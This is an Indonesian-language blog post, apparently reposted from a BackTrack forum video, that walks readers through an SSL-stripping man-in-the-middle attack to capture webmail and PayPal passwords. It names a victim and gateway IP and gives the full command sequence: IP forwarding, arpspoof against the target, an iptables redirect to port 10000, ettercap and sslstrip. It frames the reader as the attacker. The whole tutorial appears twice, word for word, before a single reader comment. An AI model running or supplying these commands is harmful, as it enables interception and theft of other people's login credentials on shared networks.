kali ini saya akan coba membahas dari si junior member gotmilk
diforum bactrack di bahas tentang ekripsiSSL tidak lah aman seperti yang di katakan buktinya email berbasis web (googlemail dan bank online paypal aja nampak kata sandinya
bagaimana caranya nya ?
namanya "man in the middle " disini semua lalulintas yang mengalir melalui si penyerang (anda)
nah disini kita memerlukan
sslstrip
Arpspoof
Ettercap
(ini semua sudah ada di bactrack 4 final)
jaringan yang ada
target kita 192.168.1.6
gateway 192.168.1.1
klo yang gak pake bactrack silakan download di
Nama: sslstrip
Versi: 0.2
Home Page: http://www.thoughtcrime.org/software...rip/index.html
Download Link: http://www.thoughtcrime.org/software...rip-0.2.tar.gz
Nama: arpspoof (DSniff)
Versi: 2.3
Home Page: http://www.monkey.org/ ~ dugsong / dsniff /
Download Link: http://www.monkey.org/ ~ dugsong/dsniff/dsniff-2.3.tar.gz
Nama: ettercap
Versi: 0.7.3
Home Page: http://ettercap.sourceforge.net
Link Download: http://prdownloads.sourceforge.net/e...ar.gz?download
nah sekarang kita main kan
root@linceh#kate /etc/etter.conf
uncomment yang di
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
root@linceh#echo 1 > /proc/sys/net/ipv4/ip_forward
root@linceh#arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
buka terminal lain dan jalankan
root@linceh#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
root@linceh#ettercap -T -q -i wlan0
dan bukan terminal lagi lalu jalankan
root@linceh#sslstrip -a -k -f
dan silakan monitor sendiri dan nikmati hasilnya ..
semoga sukses
sumber : http://www.backtrack-linux.org/forums/backtrack-videos/1659-[video]-how-snifff-ssl-https-sslstrip.html
diforum bactrack di bahas tentang ekripsiSSL tidak lah aman seperti yang di katakan buktinya email berbasis web (googlemail dan bank online paypal aja nampak kata sandinya
bagaimana caranya nya ?
namanya "man in the middle " disini semua lalulintas yang mengalir melalui si penyerang (anda)
nah disini kita memerlukan
sslstrip
Arpspoof
Ettercap
(ini semua sudah ada di bactrack 4 final)
jaringan yang ada
target kita 192.168.1.6
gateway 192.168.1.1
klo yang gak pake bactrack silakan download di
Nama: sslstrip
Versi: 0.2
Home Page: http://www.thoughtcrime.org/software...rip/index.html
Download Link: http://www.thoughtcrime.org/software...rip-0.2.tar.gz
Nama: arpspoof (DSniff)
Versi: 2.3
Home Page: http://www.monkey.org/ ~ dugsong / dsniff /
Download Link: http://www.monkey.org/ ~ dugsong/dsniff/dsniff-2.3.tar.gz
Nama: ettercap
Versi: 0.7.3
Home Page: http://ettercap.sourceforge.net
Link Download: http://prdownloads.sourceforge.net/e...ar.gz?download
nah sekarang kita main kan
root@linceh#kate /etc/etter.conf
uncomment yang di
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
root@linceh#echo 1 > /proc/sys/net/ipv4/ip_forward
root@linceh#arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
buka terminal lain dan jalankan
root@linceh#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
root@linceh#ettercap -T -q -i wlan0
dan bukan terminal lagi lalu jalankan
root@linceh#sslstrip -a -k -f
dan silakan monitor sendiri dan nikmati hasilnya ..
semoga sukses
sumber : http://www.backtrack-linux.org/forums/backtrack-videos/1659-[video]-how-snifff-ssl-https-sslstrip.html
gak berlaku tuh kaayax bwt mikrotik...
ReplyDelete